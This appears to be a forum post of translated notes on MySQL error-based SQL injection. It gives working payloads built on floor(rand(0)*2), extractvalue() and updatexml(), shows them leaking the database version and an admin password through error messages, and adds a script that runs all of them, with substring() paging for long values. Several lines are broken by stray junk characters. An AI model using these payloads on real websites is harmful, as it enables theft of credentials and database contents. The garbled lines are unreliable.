Posting some of my old notes. MySQL returns an error message when a statement fails, and PHP+MySQL sites often print that error text straight onto the page, so the three techniques below can be used to pull specific data out of the error. Two things have to be true for any of them: user input is concatenated into the query, and the database error reaches the client.
Test environment:
" n$ O% w7 n8 k
! J/ V! m/ G- W" D9 s. p ' S$ d' ]) U# S+ l& q' {3 Y2 d. \
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+
8 ^" f0 b' l7 U B# P
0 Q0 s. v$ d+ F& W4 f
3 a. x9 B g/ S+ H& X. _ 3 W% G& G3 n1 u, k( K1 b
mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+
mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
The following payloads can be used. Both rely on rand(0) being a fixed sequence (floor(rand(0)*2) yields 0,1,1,0,1,1,...) and on GROUP BY evaluating the key expression once to look it up in its temporary table and again when it inserts a missing key, so by the third row a key that already exists gets inserted and MySQL aborts with a duplicate-key error whose message embeds the concatenated data. The table being grouped must supply at least three rows: information_schema.tables always does, and the second payload builds its own three-row derived table with a UNION.

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First, a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
The MySQL version has been leaked through the error message. To read other data, replace the version() call with the subquery you need; it must return a single value, so constrain it with LIMIT 1 or a WHERE clause that matches one row.
For example, to retrieve the administrator's user name and password:
Method 1:
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:
mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement. extractvalue() exists from MySQL 5.1.5 onward; 0x5c is a backslash, which is not valid at the start of an XPath expression, so the function fails and echoes the whole concatenated string in its error. The XPath error message keeps only the first 32 characters, so longer values have to be read in pieces with substring().
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
" p9 |: w* T! O; f2 J实际测试过程5 D- G5 j9 k/ {! f& W
/ X. i- M% d8 o3 Z4 w4 ~5 `
" | K5 ]& |. c% p; {2 c2 X" s" Imysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
! S6 c7 d; S; b; S8 z6 q) v(select pass from admin limit 1)));--4 W* C) s4 e' r8 W# R7 M! {6 Y7 X
ERROR 1105 (HY000): XPATH syntax error: '\admin888'5 h0 ?- o( y" k" x& `- Q. P2 }- a# C
3. UpdateXml
Test statement. Same mechanism and same 32-character limit as extractvalue(); 0x5e24 is the two-character marker ^$ placed on both sides of the value so it is easy to pick out of the error text.
% k! [) v. E8 ?# M4 ]" Iand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
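Added reproduction script for all three sections above. It is not part of the original notes: it rebuilds the two tables from the test environment, runs the floor(), extractvalue() and updatexml() payloads in one place, and adds two checks a practitioner wants, the rand(0) sequence that explains why the floor() trick needs at least three rows, and substring() paging around the 32-character limit of the XPath error text. The database name test, the admin rows (admin/admin888 plus a second constructed row long enough to need paging) and the article row are constructed to match the outputs shown above.

```sql
-- Added example (not from the original notes). Assumes a local MySQL with
-- rights to create a scratch database named `test`. All rows are constructed.
CREATE DATABASE IF NOT EXISTS test;
USE test;
DROP TABLE IF EXISTS admin, article;
CREATE TABLE admin (
  id   INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  user VARCHAR(50) NOT NULL,
  pass VARCHAR(50) NOT NULL
);
CREATE TABLE article (
  id      INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  title   VARCHAR(50) NOT NULL,
  content VARCHAR(50) NOT NULL
);
INSERT INTO admin (user, pass) VALUES
  ('admin',  'admin888'),             -- the row shown in the notes
  ('backup', 's3cret-long-password'); -- constructed, makes group_concat > 31 chars
INSERT INTO article (title, content) VALUES ('test', 'do it');

-- Why floor(rand(0)*2) collides: rand(0) is a repeatable sequence, so the
-- first keys are 0,1,1,0,1,1,... GROUP BY looks the key up, and on a miss
-- re-evaluates the expression to insert it. Row 1: lookup '0' (miss), insert
-- '1'. Row 2: lookup '1' (hit). Row 3: lookup '0' (miss), insert '1' again,
-- which already exists -> ERROR 1062. So the grouped table needs >= 3 rows.
SELECT floor(rand(0)*2) AS k FROM information_schema.tables LIMIT 6;

-- 1a. floor() over information_schema.tables (plenty of rows); the
--     duplicate-key message embeds version() followed by the colliding digit.
SELECT * FROM article WHERE id = 1 AND (SELECT 1 FROM
  (SELECT count(*), concat(version(), floor(rand(0)*2)) x
   FROM information_schema.tables GROUP BY x) a);

-- 1b. floor() over a self-made 3-row derived table (1, NULL, 0), so it works
--     even when information_schema is not readable by the web user.
SELECT * FROM article WHERE id = 1 AND (SELECT count(*)
  FROM (SELECT 1 UNION SELECT null UNION SELECT !1) x
  GROUP BY concat((SELECT pass FROM admin WHERE id = 1), floor(rand(0)*2)));

-- 2. extractvalue(): 0x7e ('~') is as invalid at the start of an XPath
--    expression as the notes' 0x5c ('\'); the error echoes the whole string.
SELECT * FROM article WHERE id = 1 AND extractvalue(1,
  concat(0x7e, (SELECT pass FROM admin WHERE id = 1)));

-- 3. updatexml(): same error path, marker on both sides of the value.
SELECT * FROM article WHERE id = 1 AND 1 = updatexml(1,
  concat(0x7e, (SELECT pass FROM admin WHERE id = 1), 0x7e), 1);

-- Caveat: the XPath error keeps only 32 characters, and the marker uses one,
-- so page through long values 31 characters at a time with substring().
-- Here group_concat(user, ':', pass) is 42 characters and needs two pages.
SELECT * FROM article WHERE id = 1 AND extractvalue(1, concat(0x7e,
  (SELECT substring(group_concat(user, 0x3a, pass), 1, 31) FROM admin)));
SELECT * FROM article WHERE id = 1 AND extractvalue(1, concat(0x7e,
  (SELECT substring(group_concat(user, 0x3a, pass), 32, 31) FROM admin)));
```

Run it as mysql --force < script.sql (or paste it into the client): every payload statement is supposed to fail, and --force keeps the client going after each error so all of the messages are printed. The ordering of the two admin rows matters only for the first floor() variant in the notes, which used LIMIT 1 without ORDER BY; the script pins the row with WHERE id = 1 instead.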
That's all; thanks to the foreign guys who worked these out.